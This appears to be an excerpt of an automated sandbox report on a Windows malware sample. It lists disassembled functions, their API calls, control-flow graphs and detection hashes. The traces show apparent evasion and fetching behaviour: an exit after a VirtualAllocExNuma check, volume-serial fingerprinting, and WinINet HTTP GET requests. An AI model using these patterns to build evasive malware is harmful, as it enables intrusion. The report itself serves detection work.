                                  • Instruction Fuzzy Hash: 6DA2903090121ADFCB22DF75D949A6AB7F5AF44710F19817AE909DB3A2DB31DC42CB50
                                  Function 003FFFD0 Relevance: 63.1, APIs: 40, Strings: 1, Instructions: 1571stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400013
                                  • lstrlen.KERNEL32(0040CFEC), ref: 004000BD
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 004000E1
                                  • lstrlen.KERNEL32(0040CFEC), ref: 004000EC
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400110
                                  • lstrlen.KERNEL32(0040CFEC), ref: 0040011B
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 0040013F
                                  • lstrlen.KERNEL32(0040CFEC), ref: 0040015A
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400189
                                  • lstrlen.KERNEL32(0040CFEC), ref: 00400194
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 004001C3
                                  • lstrlen.KERNEL32(0040CFEC), ref: 004001CE
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400206
                                  • lstrlen.KERNEL32(0040CFEC), ref: 00400250
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 00400288
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0040059B
                                  • lstrlen.KERNEL32(01196678), ref: 004005AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 004005D7
                                  • lstrcat.KERNEL32(00000000,?), ref: 004005E3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0040060E
                                  • lstrlen.KERNEL32(011B0670), ref: 00400625
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0040064C
                                  • lstrcat.KERNEL32(00000000,?), ref: 00400658
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00400681
                                  • lstrlen.KERNEL32(01196878), ref: 00400698
                                  • lstrcpy.KERNEL32(00000000,?), ref: 004006C9
                                  • lstrcat.KERNEL32(00000000,?), ref: 004006D5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00400706
                                  • lstrcpy.KERNEL32(00000000,011A8C78), ref: 0040074B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1557
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E1579
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E159B
                                    • Part of subcall function 003E1530: lstrcpy.KERNEL32(00000000,?), ref: 003E15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0040077F
                                  • lstrcpy.KERNEL32(00000000,011B04D8), ref: 004007E7
                                  • lstrcpy.KERNEL32(00000000,011A8978), ref: 00400858
                                  • lstrcpy.KERNEL32(00000000,fplugins), ref: 004008CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00400928
                                  • lstrcpy.KERNEL32(00000000,011A8A18), ref: 004009F8
                                    • Part of subcall function 003E24E0: lstrcpy.KERNEL32(00000000,?), ref: 003E2528
                                    • Part of subcall function 003E24E0: lstrcpy.KERNEL32(00000000,?), ref: 003E254E
                                    • Part of subcall function 003E24E0: lstrcpy.KERNEL32(00000000,?), ref: 003E2577
                                  • lstrcpy.KERNEL32(00000000,011A8A88), ref: 00400ACE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00400B81
                                  • lstrcpy.KERNEL32(00000000,011A8A88), ref: 00400D58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID: fplugins
                                  • API String ID: 2500673778-38756186
                                  • Opcode ID: 663b387fa422f8a1e3ebde3ee3a26aa9b368e98a3c8ed0bd8cf238fe8a232ae0
                                  • Instruction ID: c9c8b1e1f381728fa3826884dfb68dcf2740d78072b202b9dfa1dcd3b41721b8
                                  • Opcode Fuzzy Hash: 663b387fa422f8a1e3ebde3ee3a26aa9b368e98a3c8ed0bd8cf238fe8a232ae0
                                  • Instruction Fuzzy Hash: 19E26A70A053418FD724DF29C488B6BB7E1BF88314F58857EE48D9B3A2DB399841CB56
                                  Function 003E6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2234 3e6c40-3e6c64 call 3e2930 2237 3e6c66-3e6c6b 2234->2237 2238 3e6c75-3e6c97 call 3e4bc0 2234->2238 2237->2238 2239 3e6c6d-3e6c6f lstrcpy 2237->2239 2242 3e6caa-3e6cba call 3e2930 2238->2242 2243 3e6c99 2238->2243 2239->2238 2247 3e6cbc-3e6cc2 lstrcpy 2242->2247 2248 3e6cc8-3e6cf5 InternetOpenA StrCmpCA 2242->2248 2244 3e6ca0-3e6ca8 2243->2244 2244->2242 2244->2244 2247->2248 2249 3e6cfa-3e6cfc 2248->2249 2250 3e6cf7 2248->2250 2251 3e6ea8-3e6ebb call 3e2930 2249->2251 2252 3e6d02-3e6d22 InternetConnectA 2249->2252 2250->2249 2261 3e6ebd-3e6ebf 2251->2261 2262 3e6ec9-3e6ee0 call 3e2a20 * 2 2251->2262 2253 3e6d28-3e6d5d HttpOpenRequestA 2252->2253 2254 3e6ea1-3e6ea2 InternetCloseHandle 2252->2254 2256 3e6e94-3e6e9e InternetCloseHandle 2253->2256 2257 3e6d63-3e6d65 2253->2257 2254->2251 2256->2254 2259 3e6d7d-3e6dad HttpSendRequestA HttpQueryInfoA 2257->2259 2260 3e6d67-3e6d77 InternetSetOptionA 2257->2260 2263 3e6daf-3e6dd3 call 4071e0 call 3e2a20 * 2 2259->2263 2264 3e6dd4-3e6de4 call 403d90 2259->2264 2260->2259 2261->2262 2265 3e6ec1-3e6ec3 lstrcpy 2261->2265 2264->2263 2275 3e6de6-3e6de8 2264->2275 2265->2262 2276 3e6dee-3e6e07 InternetReadFile 2275->2276 2277 3e6e8d-3e6e8e InternetCloseHandle 2275->2277 2276->2277 2279 3e6e0d 2276->2279 2277->2256 2281 3e6e10-3e6e15 2279->2281 2281->2277 2283 3e6e17-3e6e3d call 407310 2281->2283 2286 3e6e3f call 3e2a20 2283->2286 2287 3e6e44-3e6e51 call 3e2930 2283->2287 2286->2287 2291 3e6e53-3e6e57 2287->2291 2292 3e6e61-3e6e8b call 3e2a20 InternetReadFile 2287->2292 2291->2292 2293 3e6e59-3e6e5b lstrcpy 2291->2293 2292->2277 2292->2281 2293->2292
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E6C6F
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003E6CC2
                                  • InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E6CD5
                                  • StrCmpCA.SHLWAPI(?,011B0C60), ref: 003E6CED
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003E6D15
                                  • HttpOpenRequestA.WININET(00000000,GET,?,011B0550,00000000,00000000,-00400100,00000000), ref: 003E6D50
                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 003E6D77
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003E6D86
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 003E6DA5
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003E6DFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003E6E5B
                                  • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 003E6E7D
                                  • InternetCloseHandle.WININET(00000000), ref: 003E6E8E
                                  • InternetCloseHandle.WININET(?), ref: 003E6E98
                                  • InternetCloseHandle.WININET(00000000), ref: 003E6EA2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003E6EC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                  • String ID: ERROR$GET
                                  • API String ID: 3687753495-3591763792
                                  • Opcode ID: 72a8f92e6e41968add94c21bb78c8f91c9d7706d5d9250111f7477f553eee0e9
                                  • Instruction ID: 5095fb1bcf9f831bf3002250fa605cd0a5103cb9f85b86b22bc5eca5da8c003b
                                  • Opcode Fuzzy Hash: 72a8f92e6e41968add94c21bb78c8f91c9d7706d5d9250111f7477f553eee0e9
                                  • Instruction Fuzzy Hash: 1B81B271A40225AFDB21DFA5DC4AFEE77B9AF44740F154229F905EB2C0DB70AD408BA4
                                  Function 003FF2F8 Relevance: 30.1, APIs: 16, Strings: 1, Instructions: 391stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(01196798), ref: 003FF315
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF3A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FF3C7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FF47B
                                  • lstrcpy.KERNEL32(00000000,01196798), ref: 003FF4BB
                                  • lstrcpy.KERNEL32(00000000,011A8BA8), ref: 003FF4EA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FF59E
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003FF61C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF64C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF69A
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 003FF718
                                  • lstrlen.KERNEL32(011A8C58), ref: 003FF746
                                  • lstrcpy.KERNEL32(00000000,011A8C58), ref: 003FF771
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FF793
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF7E4
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 003FFA32
                                  • lstrlen.KERNEL32(011A8AE8), ref: 003FFA60
                                  • lstrcpy.KERNEL32(00000000,011A8AE8), ref: 003FFA8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FFAAD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FFAFE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ERROR
                                  • API String ID: 367037083-2861137601
                                  • Opcode ID: dd161128e74d26c2d61a3fc2885b05a567fa46b557a7a4eaf60108a1c27aaf78
                                  • Instruction ID: 0d9eddc8f074f5d32aa7a2671d22fc216de2e6cae90f079cfcba91b9e265158e
                                  • Opcode Fuzzy Hash: dd161128e74d26c2d61a3fc2885b05a567fa46b557a7a4eaf60108a1c27aaf78
                                  • Instruction Fuzzy Hash: B2F13B30A0120ADFCB26DF69C954A6AB7E5BF44714B1AC1BED9099B3A1E731DC42CF50
                                  Function 003F8CA0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 176COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2721 3f8ca0-3f8cc4 StrCmpCA 2722 3f8ccd-3f8ce6 2721->2722 2723 3f8cc6-3f8cc7 ExitProcess 2721->2723 2725 3f8cec-3f8cf1 2722->2725 2726 3f8ee2-3f8eef call 3e2a20 2722->2726 2727 3f8cf6-3f8cf9 2725->2727 2729 3f8cff 2727->2729 2730 3f8ec3-3f8edc 2727->2730 2732 3f8dbd-3f8dcb StrCmpCA 2729->2732 2733 3f8ddd-3f8deb StrCmpCA 2729->2733 2734 3f8dfd-3f8e0b StrCmpCA 2729->2734 2735 3f8e1d-3f8e2b StrCmpCA 2729->2735 2736 3f8e3d-3f8e4b StrCmpCA 2729->2736 2737 3f8d5a-3f8d69 lstrlen 2729->2737 2738 3f8e56-3f8e64 StrCmpCA 2729->2738 2739 3f8d30-3f8d3f lstrlen 2729->2739 2740 3f8e6f-3f8e7d StrCmpCA 2729->2740 2741 3f8e88-3f8e9a lstrlen 2729->2741 2742 3f8d06-3f8d15 lstrlen 2729->2742 2743 3f8d84-3f8d92 StrCmpCA 2729->2743 2744 3f8da4-3f8db8 StrCmpCA 2729->2744 2730->2726 2767 3f8cf3 2730->2767 2732->2730 2749 3f8dd1-3f8dd8 2732->2749 2733->2730 2750 3f8df1-3f8df8 2733->2750 2734->2730 2751 3f8e11-3f8e18 2734->2751 2735->2730 2752 3f8e31-3f8e38 2735->2752 2736->2730 2753 3f8e4d-3f8e54 2736->2753 2745 3f8d6b-3f8d70 call 3e2a20 2737->2745 2746 3f8d73-3f8d7f call 3e2930 2737->2746 2738->2730 2756 3f8e66-3f8e6d 2738->2756 2760 3f8d49-3f8d55 call 3e2930 2739->2760 2761 3f8d41-3f8d46 call 3e2a20 2739->2761 2740->2730 2757 3f8e7f-3f8e86 2740->2757 2758 3f8e9c-3f8ea1 call 3e2a20 2741->2758 2759 3f8ea4-3f8eb0 call 3e2930 2741->2759 2754 3f8d1f-3f8d2b call 3e2930 2742->2754 2755 3f8d17-3f8d1c call 3e2a20 2742->2755 2743->2730 2748 3f8d98-3f8d9f 2743->2748 2744->2730 2745->2746 2779 3f8eb3-3f8eb5 2746->2779 2748->2730 2749->2730 2750->2730 2751->2730 2752->2730 2753->2730 2754->2779 2755->2754 2756->2730 2757->2730 2758->2759 2759->2779 2760->2779 2761->2760 2767->2727 2779->2730 2780 3f8eb7-3f8eb9 2779->2780 2780->2730 2781 3f8ebb-3f8ebd lstrcpy 2780->2781 2781->2730
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: b886f3bcb7c45d3b5f3585b211c7934fa713f62395bdcf71c11af9d9ff28d92f
                                  • Instruction ID: d0b0d0f7e8281133490be21ea927ba87af2d70f7f0f420d64addc09a5d55ea26
                                  • Opcode Fuzzy Hash: b886f3bcb7c45d3b5f3585b211c7934fa713f62395bdcf71c11af9d9ff28d92f
                                  • Instruction Fuzzy Hash: C351AE31A047099FC7269F76DD84EBB7BF8BF65700B10582EE642C6651DBB8E441CB60
                                  Function 00402740 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2782 402740-402783 GetWindowsDirectoryA 2783 402785 2782->2783 2784 40278c-4027ea GetVolumeInformationA 2782->2784 2783->2784 2785 4027ec-4027f2 2784->2785 2786 4027f4-402807 2785->2786 2787 402809-402820 GetProcessHeap RtlAllocateHeap 2785->2787 2786->2785 2788 402822-402824 2787->2788 2789 402826-402844 wsprintfA 2787->2789 2790 40285b-402872 call 4071e0 2788->2790 2789->2790
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0040277B
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003F93B6,00000000,00000000,00000000,00000000), ref: 004027AC
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040280F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402816
                                  • wsprintfA.USER32 ref: 0040283B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                  • String ID: :\$C
                                  • API String ID: 2572753744-3309953409
                                  • Opcode ID: c5a8230d198d3bd584c0a6bf8f976007a3e81053a046d963a715c676b37c85b3
                                  • Instruction ID: 8b4d4bb2f1c29d88546c9d9fdf2c61c58c275220a9d64bd91f62998f3ee7490b
                                  • Opcode Fuzzy Hash: c5a8230d198d3bd584c0a6bf8f976007a3e81053a046d963a715c676b37c85b3
                                  • Instruction Fuzzy Hash: 203172B1D042099FCB04DFA88A859EFBFBCEB58704F10416AE505F7290E2748A408BA5
                                  Function 003E4BC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2793 3e4bc0-3e4bce 2794 3e4bd0-3e4bd5 2793->2794 2794->2794 2795 3e4bd7-3e4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 3e2a20 2794->2795
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 003E4BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 003E4C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 003E4C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 003E4C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 003E4C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: bc6c3495889932933e611db67c03f77b5cacfe599b2b76e237ee0011f294dbd5
                                  • Instruction ID: ec62df04ddfc160228edc4753b071c1c047dcaad5da9ea5ba050900ee293b286
                                  • Opcode Fuzzy Hash: bc6c3495889932933e611db67c03f77b5cacfe599b2b76e237ee0011f294dbd5
                                  • Instruction Fuzzy Hash: 67012D71D00218AFDB10DFA9EC45B9EBBB8EB08360F008126F954E7390DB7459058FD4
                                  Function 003E1030 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2798 3e1030-3e1055 GetCurrentProcess VirtualAllocExNuma 2799 3e105e-3e107b VirtualAlloc 2798->2799 2800 3e1057-3e1058 ExitProcess 2798->2800 2801 3e107d-3e1080 2799->2801 2802 3e1082-3e1088 2799->2802 2801->2802 2803 3e108a-3e10ab VirtualFree 2802->2803 2804 3e10b1-3e10b6 2802->2804 2803->2804
                                  APIs
